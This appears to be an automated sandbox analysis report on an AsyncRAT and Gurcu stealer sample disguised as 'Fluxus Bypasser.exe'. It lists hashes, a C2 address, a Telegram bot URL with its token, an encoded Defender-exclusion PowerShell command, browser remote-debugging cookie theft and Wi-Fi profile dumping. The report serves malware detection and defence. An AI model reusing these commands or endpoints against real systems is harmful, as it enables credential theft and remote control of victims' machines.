Analysis
-
max time kernel
27s -
max time network
38s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
02-01-2025 02:26
Static task
static1
Behavioral task
behavioral1
Sample
Fluxus Bypasser.exe
Resource
win10v2004-20241007-en
General
-
Target
Fluxus Bypasser.exe
-
Size
6.1MB
-
MD5
bc75ded499b78782fa5ab41561d847a7
-
SHA1
b3d1278da7f60d4f9f2c0580fdd997a5b644b3c9
-
SHA256
caf613a1af353c2d278a67129ba2f21306b8f62f271fd34fb843ed25c035c6e3
-
SHA512
b691dcd32e8eec8025e76ef6a9431de14f97af2994d7a9d79687787ba2e09113ad0d9a424ba7dd1d73a21a81c10ba7f12a503a5d270f31457d94943c4251cd67
-
SSDEEP
98304:IdGCNttQ3Bn6r0/M6Um59hti6VEeSx4WLhdK2OKM7Ebnoq1LV39rnNZ2q6nE:4N03Bj/M6R59h5zWLPSKMQbooN9r4E
Malware Config
Extracted
asyncrat
1.0.7
Default
51.89.44.68:8848
etb3t1tr5n
-
delay
1
-
install
true
-
install_file
svchost.exe
-
install_folder
%Temp%
Extracted
gurcu
https://api.telegram.org/bot8152045153:AAHKgir_sbApACu0yi_YtTY7nKef4DvyTzU/getM
Signatures
-
Asyncrat family
-
Gurcu family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral1/files/0x000e000000023a73-69.dat family_asyncrat -
Downloads MZ/PE file
-
Uses browser remote debugging 2 TTPs 6 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 876 chrome.exe 3000 chrome.exe 2700 chrome.exe 872 chrome.exe 3048 msedge.exe 4644 msedge.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation Fluxus Bypasser.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation SVCHost.exe -
Executes dropped EXE 5 IoCs
pid Process 1036 Conhost.exe 2436 SVCHost.exe 1428 svchost.exe 1964 svchost.exe 4820 svchost.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 SVCHost.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 SVCHost.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 SVCHost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 8 raw.githubusercontent.com 10 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 41 icanhazip.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fluxus Bypasser.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Conhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 3712 cmd.exe 5088 netsh.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 SVCHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier SVCHost.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Suspicious behavior: EnumeratesProcesses 34 IoCs
pid Process 1480 powershell.exe 1480 powershell.exe 2436 SVCHost.exe 2436 SVCHost.exe 2436 SVCHost.exe 2436 SVCHost.exe 2436 SVCHost.exe 2436 SVCHost.exe 2436 SVCHost.exe 876 chrome.exe 876 chrome.exe 2436 SVCHost.exe 2436 SVCHost.exe 2436 SVCHost.exe 2436 SVCHost.exe 2436 SVCHost.exe 2436 SVCHost.exe 2436 SVCHost.exe 2436 SVCHost.exe 2436 SVCHost.exe 2436 SVCHost.exe 2436 SVCHost.exe 2436 SVCHost.exe 2436 SVCHost.exe 2436 SVCHost.exe 2436 SVCHost.exe 2436 SVCHost.exe 2436 SVCHost.exe 2436 SVCHost.exe 2436 SVCHost.exe 2436 SVCHost.exe 2436 SVCHost.exe 3124 msedge.exe 3124 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
pid Process 876 chrome.exe 876 chrome.exe 876 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2436 SVCHost.exe Token: SeDebugPrivilege 1480 powershell.exe Token: SeIncreaseQuotaPrivilege 1428 svchost.exe Token: SeSecurityPrivilege 1428 svchost.exe Token: SeTakeOwnershipPrivilege 1428 svchost.exe Token: SeLoadDriverPrivilege 1428 svchost.exe Token: SeSystemProfilePrivilege 1428 svchost.exe Token: SeSystemtimePrivilege 1428 svchost.exe Token: SeProfSingleProcessPrivilege 1428 svchost.exe Token: SeIncBasePriorityPrivilege 1428 svchost.exe Token: SeCreatePagefilePrivilege 1428 svchost.exe Token: SeBackupPrivilege 1428 svchost.exe Token: SeRestorePrivilege 1428 svchost.exe Token: SeShutdownPrivilege 1428 svchost.exe Token: SeDebugPrivilege 1428 svchost.exe Token: SeSystemEnvironmentPrivilege 1428 svchost.exe Token: SeRemoteShutdownPrivilege 1428 svchost.exe Token: SeUndockPrivilege 1428 svchost.exe Token: SeManageVolumePrivilege 1428 svchost.exe Token: 33 1428 svchost.exe Token: 34 1428 svchost.exe Token: 35 1428 svchost.exe Token: 36 1428 svchost.exe Token: SeIncreaseQuotaPrivilege 1964 svchost.exe Token: SeSecurityPrivilege 1964 svchost.exe Token: SeTakeOwnershipPrivilege 1964 svchost.exe Token: SeLoadDriverPrivilege 1964 svchost.exe Token: SeSystemProfilePrivilege 1964 svchost.exe Token: SeSystemtimePrivilege 1964 svchost.exe Token: SeProfSingleProcessPrivilege 1964 svchost.exe Token: SeIncBasePriorityPrivilege 1964 svchost.exe Token: SeCreatePagefilePrivilege 1964 svchost.exe Token: SeBackupPrivilege 1964 svchost.exe Token: SeRestorePrivilege 1964 svchost.exe Token: SeShutdownPrivilege 1964 svchost.exe Token: SeDebugPrivilege 1964 svchost.exe Token: SeSystemEnvironmentPrivilege 1964 svchost.exe Token: SeRemoteShutdownPrivilege 1964 svchost.exe Token: SeUndockPrivilege 1964 svchost.exe Token: SeManageVolumePrivilege 1964 svchost.exe Token: 33 1964 svchost.exe Token: 34 1964 svchost.exe Token: 35 1964 svchost.exe Token: 36 1964 svchost.exe Token: SeShutdownPrivilege 876 chrome.exe Token: SeCreatePagefilePrivilege 876 chrome.exe Token: SeShutdownPrivilege 876 chrome.exe Token: SeCreatePagefilePrivilege 876 chrome.exe Token: SeShutdownPrivilege 876 chrome.exe Token: SeCreatePagefilePrivilege 876 chrome.exe Token: SeSecurityPrivilege 1964 msiexec.exe Token: SeShutdownPrivilege 876 chrome.exe Token: SeCreatePagefilePrivilege 876 chrome.exe Token: SeIncreaseQuotaPrivilege 4820 svchost.exe Token: SeSecurityPrivilege 4820 svchost.exe Token: SeTakeOwnershipPrivilege 4820 svchost.exe Token: SeLoadDriverPrivilege 4820 svchost.exe Token: SeSystemProfilePrivilege 4820 svchost.exe Token: SeSystemtimePrivilege 4820 svchost.exe Token: SeProfSingleProcessPrivilege 4820 svchost.exe Token: SeIncBasePriorityPrivilege 4820 svchost.exe Token: SeCreatePagefilePrivilege 4820 svchost.exe Token: SeBackupPrivilege 4820 svchost.exe Token: SeRestorePrivilege 4820 svchost.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 876 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3576 wrote to memory of 1480 3576 Fluxus Bypasser.exe 84 PID 3576 wrote to memory of 1480 3576 Fluxus Bypasser.exe 84 PID 3576 wrote to memory of 1480 3576 Fluxus Bypasser.exe 84 PID 3576 wrote to memory of 1036 3576 Fluxus Bypasser.exe 86 PID 3576 wrote to memory of 1036 3576 Fluxus Bypasser.exe 86 PID 3576 wrote to memory of 1036 3576 Fluxus Bypasser.exe 86 PID 3576 wrote to memory of 2436 3576 Fluxus Bypasser.exe 87 PID 3576 wrote to memory of 2436 3576 Fluxus Bypasser.exe 87 PID 2436 wrote to memory of 1428 2436 SVCHost.exe 90 PID 2436 wrote to memory of 1428 2436 SVCHost.exe 90 PID 2436 wrote to memory of 1964 2436 SVCHost.exe 103 PID 2436 wrote to memory of 1964 2436 SVCHost.exe 103 PID 2436 wrote to memory of 876 2436 SVCHost.exe 109 PID 2436 wrote to memory of 876 2436 SVCHost.exe 109 PID 876 wrote to memory of 2548 876 chrome.exe 110 PID 876 wrote to memory of 2548 876 chrome.exe 110 PID 876 wrote to memory of 4660 876 chrome.exe 111 PID 876 wrote to memory of 4660 876 chrome.exe 111 PID 876 wrote to memory of 4660 876 chrome.exe 111 PID 876 wrote to memory of 4660 876 chrome.exe 111 PID 876 wrote to memory of 4660 876 chrome.exe 111 PID 876 wrote to memory of 4660 876 chrome.exe 111 PID 876 wrote to memory of 4660 876 chrome.exe 111 PID 876 wrote to memory of 4660 876 chrome.exe 111 PID 876 wrote to memory of 4660 876 chrome.exe 111 PID 876 wrote to memory of 4660 876 chrome.exe 111 PID 876 wrote to memory of 4660 876 chrome.exe 111 PID 876 wrote to memory of 4660 876 chrome.exe 111 PID 876 wrote to memory of 4660 876 chrome.exe 111 PID 876 wrote to memory of 4660 876 chrome.exe 111 PID 876 wrote to memory of 4660 876 chrome.exe 111 PID 876 wrote to memory of 4660 876 chrome.exe 111 PID 876 wrote to memory of 4660 876 chrome.exe 111 PID 876 wrote to memory of 4660 876 chrome.exe 111 PID 876 wrote to memory of 4660 876 chrome.exe 111 PID 876 wrote to memory of 4660 876 chrome.exe 111 PID 876 wrote to memory of 4660 876 chrome.exe 111 PID 876 wrote to memory of 4660 876 chrome.exe 111 PID 876 wrote to memory of 4660 876 chrome.exe 111 PID 876 wrote to memory of 4660 876 chrome.exe 111 PID 876 wrote to memory of 4660 876 chrome.exe 111 PID 876 wrote to memory of 4660 876 chrome.exe 111 PID 876 wrote to memory of 4660 876 chrome.exe 111 PID 876 wrote to memory of 4660 876 chrome.exe 111 PID 876 wrote to memory of 4660 876 chrome.exe 111 PID 876 wrote to memory of 4660 876 chrome.exe 111 PID 876 wrote to memory of 4688 876 chrome.exe 112 PID 876 wrote to memory of 4688 876 chrome.exe 112 PID 876 wrote to memory of 1108 876 chrome.exe 113 PID 876 wrote to memory of 1108 876 chrome.exe 113 PID 876 wrote to memory of 1108 876 chrome.exe 113 PID 876 wrote to memory of 1108 876 chrome.exe 113 PID 876 wrote to memory of 1108 876 chrome.exe 113 PID 876 wrote to memory of 1108 876 chrome.exe 113 PID 876 wrote to memory of 1108 876 chrome.exe 113 PID 876 wrote to memory of 1108 876 chrome.exe 113 PID 876 wrote to memory of 1108 876 chrome.exe 113 PID 876 wrote to memory of 1108 876 chrome.exe 113 PID 876 wrote to memory of 1108 876 chrome.exe 113 PID 876 wrote to memory of 1108 876 chrome.exe 113 PID 876 wrote to memory of 1108 876 chrome.exe 113 PID 876 wrote to memory of 1108 876 chrome.exe 113 PID 876 wrote to memory of 1108 876 chrome.exe 113 PID 876 wrote to memory of 1108 876 chrome.exe 113 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 SVCHost.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 SVCHost.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Fluxus Bypasser.exe"C:\Users\Admin\AppData\Local\Temp\Fluxus Bypasser.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3576 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAbgB2ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGkAcgBkACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHgAcQB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAZQBzACMAPgA="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1480
-
-
C:\Users\Admin\AppData\Local\Temp\Conhost.exe"C:\Users\Admin\AppData\Local\Temp\Conhost.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1036
-
-
C:\Users\Admin\AppData\Local\Temp\SVCHost.exe"C:\Users\Admin\AppData\Local\Temp\SVCHost.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
PID:2436 -
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1428
-
-
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1964
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --headless=new --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --disable-gpu --disable-logging3⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:876 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9f0edcc40,0x7ff9f0edcc4c,0x7ff9f0edcc584⤵PID:2548
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-logging --headless=new --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --disable-logging --field-trial-handle=1980,i,14273923028507975802,9560392818579408283,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1972 /prefetch:24⤵PID:4660
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --disable-logging --field-trial-handle=1888,i,14273923028507975802,9560392818579408283,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1836 /prefetch:34⤵PID:4688
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --disable-logging --field-trial-handle=2168,i,14273923028507975802,9560392818579408283,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2364 /prefetch:84⤵PID:1108
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --disable-logging --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3064,i,14273923028507975802,9560392818579408283,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3104 /prefetch:14⤵
- Uses browser remote debugging
PID:2700
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --disable-logging --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3056,i,14273923028507975802,9560392818579408283,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3132 /prefetch:14⤵
- Uses browser remote debugging
PID:3000
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --disable-logging --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4388,i,14273923028507975802,9560392818579408283,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4380 /prefetch:14⤵
- Uses browser remote debugging
PID:872
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --disable-logging --field-trial-handle=4652,i,14273923028507975802,9560392818579408283,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4660 /prefetch:84⤵PID:3396
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --disable-logging --field-trial-handle=4736,i,14273923028507975802,9560392818579408283,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4748 /prefetch:84⤵PID:1316
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3712 -
C:\Windows\system32\chcp.comchcp 650014⤵PID:3756
-
-
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5088
-
-
C:\Windows\system32\findstr.exefindstr All4⤵PID:4340
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid3⤵PID:3676
-
C:\Windows\system32\chcp.comchcp 650014⤵PID:2860
-
-
C:\Windows\system32\netsh.exenetsh wlan show networks mode=bssid4⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4848
-
-
-
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4820
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9222 --headless=new --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --disable-gpu --disable-logging3⤵
- Uses browser remote debugging
PID:3048 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff9f0c846f8,0x7ff9f0c84708,0x7ff9f0c847184⤵PID:4412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1488,16291497205155309920,93671898828207544,131072 --disable-features=PaintHolding --disable-logging --headless=new --headless --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --override-use-software-gl-for-tests --disable-logging --mojo-platform-channel-handle=1496 /prefetch:24⤵PID:4408
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1488,16291497205155309920,93671898828207544,131072 --disable-features=PaintHolding --lang=en-US --service-sandbox-type=none --use-gl=swiftshader-webgl --headless --disable-logging --mojo-platform-channel-handle=1736 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:3124
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --disable-logging --remote-debugging-port=9222 --allow-pre-commit-input --field-trial-handle=1488,16291497205155309920,93671898828207544,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1924 /prefetch:14⤵
- Uses browser remote debugging
PID:4644
-
-
-
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"3⤵PID:4820
-
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:3636
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1964
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4188
Network
MITRE ATT&CK Enterprise v15
Persistence
Event Triggered Execution
1Netsh Helper DLL
1Modify Authentication Process
1Defense Evasion
Modify Authentication Process
1Obfuscated Files or Information
1Command Obfuscation
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\334620868febbcde81a921d8f214b477\Admin@GLZCSNLK_en-US\Browsers\Firefox\Bookmarks.txt
Filesize220B
MD52ab1fd921b6c195114e506007ba9fe05
SHA190033c6ee56461ca959482c9692cf6cfb6c5c6af
SHA256c79cfdd6d0757eb52fbb021e7f0da1a2a8f1dd81dcd3a4e62239778545a09ecc
SHA5124f0570d7c7762ecb4dcf3171ae67da3c56aa044419695e5a05f318e550f1a910a616f5691b15abfe831b654718ec97a534914bd172aa7a963609ebd8e1fae0a5
-
Filesize
5KB
MD5a105c48f1cc8ac437d8d57fea105f8cd
SHA1aab58abc7595b2f37009133c3e2846448c883dd6
SHA256c4cb169255afb124f4c40c6666191a5323641b81c3ffb2423c029fc43bf9712b
SHA512aa4b3190b9e67ffa9bcb82646b5c8c0dda743b396e50fa149cd3f79964319fce3ff900af9aec1a1a526429b20ec26bb94ba033d5c3251ef94a9acfdef070b115
-
C:\Users\Admin\AppData\Local\334620868febbcde81a921d8f214b477\Admin@GLZCSNLK_en-US\System\Process.txt
Filesize782B
MD5bd2f2ca9e7834d5b2394745f2fc2302f
SHA1d494e912b817f741ca369884e7638efd0e38231e
SHA2565000b3fe5c19c971de34c390a5fd92726f62821322a535cb3b7e981c88396106
SHA512b22fa8e2c03da9e4538ce7ceb4354d80029933639242e7958ae2583ce0c5a6dbd148c3adc2355a0407e69304dcfcf96b0cccdae4b6750b555c202d3989625862
-
C:\Users\Admin\AppData\Local\334620868febbcde81a921d8f214b477\Admin@GLZCSNLK_en-US\System\Process.txt
Filesize1KB
MD5994681462e657487227de581d0a68b1f
SHA1013b12105710915eebf79ae8e2194ca0cfe6b9e7
SHA256e93e29b3e6916c87be21c53884a1194825db71c43283d533c7881c8cb86873ae
SHA512b29457eb3034d999eeba684812e555d9bb802f7a57a4c592bab2ea01767134b0c94dfacdb7cdf83c7e5593321bcaf74e74568051c970b7640c32513c5d66e0e6
-
C:\Users\Admin\AppData\Local\334620868febbcde81a921d8f214b477\Admin@GLZCSNLK_en-US\System\Process.txt
Filesize1KB
MD5a39dfe56eaf5b6de682fa8748bb27882
SHA153208325748cd3640438a410e61e6d96f127b8b4
SHA256c101c80410abf58287bd0a15d16b81204a804fc97f836e2f2233388e1cb7a85e
SHA51270b2d14742ee76963ae5aceae86a6a0e787228bfad6d7278bc7a49b50e29fc29280e53ba52d971cbb325dd8968f432b74a5a5859c56b725caa5e88c7f8c0f038
-
C:\Users\Admin\AppData\Local\334620868febbcde81a921d8f214b477\Admin@GLZCSNLK_en-US\System\Process.txt
Filesize1KB
MD547b35936597464460a66a69701590049
